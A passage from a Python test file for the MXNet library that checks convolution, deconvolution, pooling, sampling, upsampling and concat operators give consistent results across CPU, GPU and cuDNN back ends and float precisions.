    w = mx.sym.Variable('conv_weight')
    b = mx.sym.Variable('conv_bias')
    # Emulate NHWC: transpose data/weights into NHWC, convolve, transpose back.
    w = mx.sym.transpose(w, axes=(0,2,3,1))
    sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
    sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
    sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
    # One symbol per context entry below (five NCHW, two NHWC).
    sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
    ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
                # NHWC
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
                 'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
                 'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
                ]
    # wider tolerance needed for true-fp16 NCHW test above
    tol = {np.dtype(np.float16): 0.5,
           np.dtype(np.float32): 1e-3,
           np.dtype(np.float64): 1e-5,
           np.dtype(np.uint8): 0,
           np.dtype(np.int32): 0}
    check_consistency(sym, ctx_list, tol=tol)
    # test ability to turn off training on bias
    check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
    """Cross-check every symbol in ``sym_list`` on every context in ``ctx_list``.

    e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
    sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
    """
    repeated_syms = np.repeat(sym_list, len(ctx_list))
    tiled_ctxs = ctx_list * len(sym_list)
    check_consistency(repeated_syms, tiled_ctxs)
@with_seed()
def test_convolution_options():
    """Cross-check cuDNN vs non-cuDNN Convolution across contexts/dtypes for
    1D, 2D and 3D inputs, exercising padding, stride, dilation and 1x1 kernels."""
    # 1D convolution
    ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
    # Pad > 0
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Stride > 1
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Dilate > 1
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # 1x1 convolution
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)

    # 2D convolution
    ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
    # Pad > 0
    sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Stride > 1
    sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Dilate > 1
    sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # 1x1 convolution
    sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)

    # 3D convolution
    ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
    # Pad > 0
    sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Stride > 1
    sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # 1x1 convolution
    sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_convolution_versions():
    """Cross-check Convolution_v1 and Convolution across CPU/GPU/cuDNN."""
    # 2D convolution NCHW: one symbol per context entry, same order.
    ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
    syms_2d = [
        mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv'),                  # v1 cpu
        mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv'),  # v1 gpu
        mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv'),                     # cudnn
        mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv'),                     # cpu
        mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv'),     # gpu
    ]
    check_consistency(syms_2d, ctx_list)

    # 3D convolution NCDHW
    ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
    syms_3d = [
        mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv'),                   # cudnn
        mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv'),                   # cpu
        mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv'),   # gpu
    ]
    check_consistency(syms_3d, ctx_list)
@with_seed()
def test_pooling_with_type():
    """Compare max pooling across contexts/dtypes for each pooling convention."""
    ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
                {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
                {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
                {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
                {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
    for convention in ('valid', 'full'):
        check_consistency(
            mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention=convention, name='pool'),
            ctx_list)
    # Global pooling with a deliberately oversized kernel.
    check_consistency(
        mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool'),
        ctx_list)
@with_seed()
def test_deconvolution_with_type():
    """Basic Deconvolution dtype-consistency test (no stride, pad or dilation).

    Exercises 1D and 2D deconvolution over fp64/fp32/fp16 on GPU and fp64/fp32
    on CPU, for both 'write' and 'add' gradient accumulation.
    """
    # Wider tolerance needed for the true-fp16 cases. Defined once and shared by
    # the 1D and 2D checks (previously this dict was duplicated verbatim).
    tol = {np.dtype(np.float16): 0.3,
           np.dtype(np.float32): 1e-3,
           np.dtype(np.float64): 1e-5,
           np.dtype(np.uint8): 0,
           np.dtype(np.int32): 0}

    # 1D deconvolution
    sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
    ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
    check_consistency(sym, ctx_list, tol=tol)
    check_consistency(sym, ctx_list, tol=tol, grad_req="add")

    # 2D deconvolution
    sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
    ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
    check_consistency(sym, ctx_list, tol=tol)
    check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
    """Deconvolution pad/stride/dilate consistency, cuDNN vs. non-cuDNN path."""
    # 1D deconvolution
    ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
    # One variant each for pad > 0, stride > 1 and dilate > 1.
    for option in ({'pad': (1,)}, {'stride': (2,)}, {'dilate': (2,)}):
        sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), name='deconv', **option)
        sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), cudnn_off=True,
                                            name='deconv', **option)
        check_consistency_NxM([sym, sym_no_cudnn], ctx_list)

    # 2D deconvolution
    ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
                {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
                {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
    for option in ({'pad': (1, 1)}, {'stride': (2, 2)}, {'dilate': (2, 2)}):
        sym = mx.sym.Deconvolution(num_filter=2, kernel=(3, 3), name='deconv', **option)
        sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3, 3), cudnn_off=True,
                                            name='deconv', **option)
        check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # 3D deconvolution is not yet enabled, so no 3D cases are exercised here.
@with_seed(1234)
def test_bilinear_sampler_with_type():
    """BilinearSampler dtype consistency on GPU (fp64/32/16) and CPU (fp64/32)."""
    sym = mx.sym.BilinearSampler(data=mx.sym.Variable('data'),
                                 grid=mx.sym.Variable('grid'))
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
    ctx_list = [{'ctx': dev, 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
                 'type_dict': {'data': dtype}} for dev, dtype in cases]
    check_consistency(sym, ctx_list)
    check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
    """GridGenerator CPU/GPU consistency for both affine and warp transforms."""
    data = mx.sym.Variable('data')
    # (transform_type, matching input shape) pairs.
    for transform, dshape in (('affine', (3, 6)), ('warp', (3, 2, 20, 20))):
        sym = mx.sym.GridGenerator(data=data, transform_type=transform, target_shape=(20, 20))
        ctx_list = [{'ctx': dev, 'data': dshape, 'type_dict': {'data': np.float32}}
                    for dev in (mx.gpu(0), mx.cpu(0))]
        check_consistency(sym, ctx_list)
        check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/7645")
@with_seed(1234)
def test_spatial_transformer_with_type():
    """SpatialTransformer CPU/GPU consistency with a tiny localization network."""
    data = mx.sym.Variable('data')
    # Localization net: flatten -> FC(10) -> relu -> FC(6) producing affine params.
    hidden = mx.sym.FullyConnected(data=mx.sym.Flatten(data), num_hidden=10)
    hidden = mx.sym.Activation(data=hidden, act_type='relu')
    loc = mx.sym.FullyConnected(data=hidden, num_hidden=6)
    sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
                                    transform_type="affine", sampler_type="bilinear")
    ctx_list = [{'ctx': dev, 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}}
                for dev in (mx.gpu(0), mx.cpu(0))]
    check_consistency(sym, ctx_list)
    check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency over the data sets of different float types is problematic
# as one max value in a float32 data set may not be the max value in a float16 data set.
# This function will not be called.
@with_seed(1234)
def test_pooling_with_type():
    # NOTE(review): this redefines test_pooling_with_type (already defined earlier
    # in this file), so only one of the two bindings survives at import time.
    # Confirm which variant the test runner actually collects; the comment above
    # suggests this one is meant to stay disabled.
    ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
                {'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
                {'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
                {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
                {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
    sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
    check_consistency(sym, ctx_list)
    sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
    check_consistency(sym, ctx_list)
    # this is unstable
    # sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
    # check_consistency(sym, ctx_list)
    sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
    check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_versions():
    """Cross-check Pooling, Pooling_v1 and the cuDNN pooling path.

    Covers 1D/2D/3D pooling for 'max', 'avg' and 'sum', both pooling
    conventions ('valid'/'full'), and global pooling. Pooling_v1 supports
    only the 2D case and is skipped where noted for non-zero padding.
    """
    def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
                                     pooling_convention='valid', global_pool=False):
        # ctx_list and sym_list are built index-aligned: one (context, symbol)
        # pair is appended per operator variant named in pool_op_list.
        ctx_list = []
        sym_list = []
        # PoolingV1 cpu
        if 'pool_v1_cpu' in pool_op_list:
            ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
            if not global_pool:
                sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                                  pooling_convention=pooling_convention, name='pool'))
            else:
                sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
        # PoolingV1 gpu
        if 'pool_v1_gpu' in pool_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
            if not global_pool:
                sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                                  pooling_convention=pooling_convention, name='pool'))
            else:
                sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
        # Pooling cpu
        if 'pool_cpu' in pool_op_list:
            ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
            if not global_pool:
                sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                               pooling_convention=pooling_convention, name='pool'))
            else:
                sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
        # Pooling gpu (cudnn explicitly disabled)
        if 'pool_gpu' in pool_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
            if not global_pool:
                sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                               pooling_convention=pooling_convention, cudnn_off=True, name='pool'))
            else:
                sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
                                               name='pool'))
        # CuDNNPooling (cudnn explicitly enabled)
        if 'pool_cudnn' in pool_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
            if not global_pool:
                sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                               pooling_convention=pooling_convention, cudnn_off=False, name='pool'))
            else:
                sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=False,
                                               name='pool'))
        check_consistency(sym_list, ctx_list)

    def test_1d_pooling(pool_type):
        # Pooling_v1 has no 1D support, so only pool_cpu/pool_gpu are compared.
        data = (2, 3, 20)
        kernel = (4,)
        pad = (0,)
        stride = (1,)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='valid', global_pool=False)

        pad = (2,)
        stride = (2,)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='valid', global_pool=False)

        pad = (0,)
        stride = (1,)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='full', global_pool=False)

        pad = (2,)
        stride = (2,)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='full', global_pool=False)

        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     global_pool=True)

    def test_2d_pooling(pool_type):
        data = (2, 3, 20, 20)
        kernel = (4, 5)
        pad = (0, 0)
        stride = (1, 1)
        test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='valid', global_pool=False)

        # pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
        pad = (2, 3)
        stride = (2, 3)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='valid', global_pool=False)

        pad = (0, 0)
        stride = (1, 1)
        test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='full', global_pool=False)

        # pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
        pad = (2, 3)
        stride = (2, 3)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='full', global_pool=False)

        test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     global_pool=True)

    def test_3d_pooling(pool_type):
        # Pooling_v1 has no 3D support, so it is excluded here as well.
        data = (2, 3, 20, 20, 20)
        kernel = (4, 5, 3)
        pad = (0, 0, 0)
        stride = (1, 1, 1)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='valid', global_pool=False)

        pad = (2, 3, 3)
        stride = (2, 3, 1)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='valid', global_pool=False)

        pad = (0, 0, 0)
        stride = (1, 1, 1)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='full', global_pool=False)

        pad = (2, 3, 3)
        stride = (2, 3, 1)
        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     pooling_convention='full', global_pool=False)

        test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
                                     data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                     global_pool=True)

    test_1d_pooling('max')
    test_1d_pooling('avg')
    test_1d_pooling('sum')

    test_2d_pooling('max')
    test_2d_pooling('avg')
    test_2d_pooling('sum')

    test_3d_pooling('max')
    test_3d_pooling('avg')
    test_3d_pooling('sum')
@with_seed()
def test_global_pooling():
    """Consistency of global pooling across backends, with and without the
    (irrelevant under global_pool=True) kernel/pad/stride arguments."""
    def test_1d_pooling(pool_type):
        data = (2, 3, 20)
        kernel = (4,)
        pad = (2,)
        stride = (2,)
        pooling_convention = 'valid'
        ctx_list = []
        sym_list = []

        def add_case(ctx, **extra):
            # Appends one index-aligned (context, symbol) pair; `extra` may
            # carry pad/stride and/or the cudnn_off switch.
            ctx_list.append({'ctx': ctx, 'pool_data': data,
                             'type_dict': {'pool_data': np.float32}})
            sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
                                           pooling_convention=pooling_convention,
                                           global_pool=True, name='pool', **extra))

        add_case(mx.cpu(0), pad=pad, stride=stride)
        add_case(mx.cpu(0))
        add_case(mx.gpu(0), pad=pad, stride=stride, cudnn_off=False)
        add_case(mx.gpu(0), cudnn_off=False)
        add_case(mx.gpu(0), pad=pad, stride=stride, cudnn_off=True)
        add_case(mx.gpu(0), cudnn_off=True)
        check_consistency(sym_list, ctx_list)

    def test_2d_pooling(pool_type):
        data = (2, 3, 20, 20)
        kernel = (4, 4)
        pad = (2, 2)
        stride = (2, 2)
        pooling_convention = 'valid'
        ctx_list = []
        sym_list = []

        def add_case(ctx, op, **extra):
            # Same as the 1D helper, but also parameterized over the pooling
            # operator (Pooling vs. Pooling_v1).
            ctx_list.append({'ctx': ctx, 'pool_data': data,
                             'type_dict': {'pool_data': np.float32}})
            sym_list.append(op(kernel=kernel, pool_type=pool_type,
                               pooling_convention=pooling_convention,
                               global_pool=True, name='pool', **extra))

        add_case(mx.cpu(0), mx.sym.Pooling_v1, pad=pad, stride=stride)
        add_case(mx.cpu(0), mx.sym.Pooling_v1)
        add_case(mx.cpu(0), mx.sym.Pooling, pad=pad, stride=stride)
        add_case(mx.cpu(0), mx.sym.Pooling)
        add_case(mx.gpu(0), mx.sym.Pooling, pad=pad, stride=stride, cudnn_off=False)
        add_case(mx.gpu(0), mx.sym.Pooling, cudnn_off=False)
        add_case(mx.gpu(0), mx.sym.Pooling, pad=pad, stride=stride, cudnn_off=True)
        add_case(mx.gpu(0), mx.sym.Pooling, cudnn_off=True)
        check_consistency(sym_list, ctx_list)

    for pool_type in ('max', 'avg', 'sum'):
        test_1d_pooling(pool_type)
    for pool_type in ('max', 'avg', 'sum'):
        test_2d_pooling(pool_type)
@with_seed()
def test_upsampling_with_type():
    """Nearest-neighbour UpSampling dtype consistency across devices."""
    sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
    ctx_list = [{'ctx': dev, 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
    """Bilinear UpSampling dtype consistency across devices."""
    sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
    ctx_list = [{'ctx': dev, 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
    """Concat dtype consistency across devices (both args share one dtype)."""
    sym = mx.sym.Concat(name='concat', num_args=2)
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
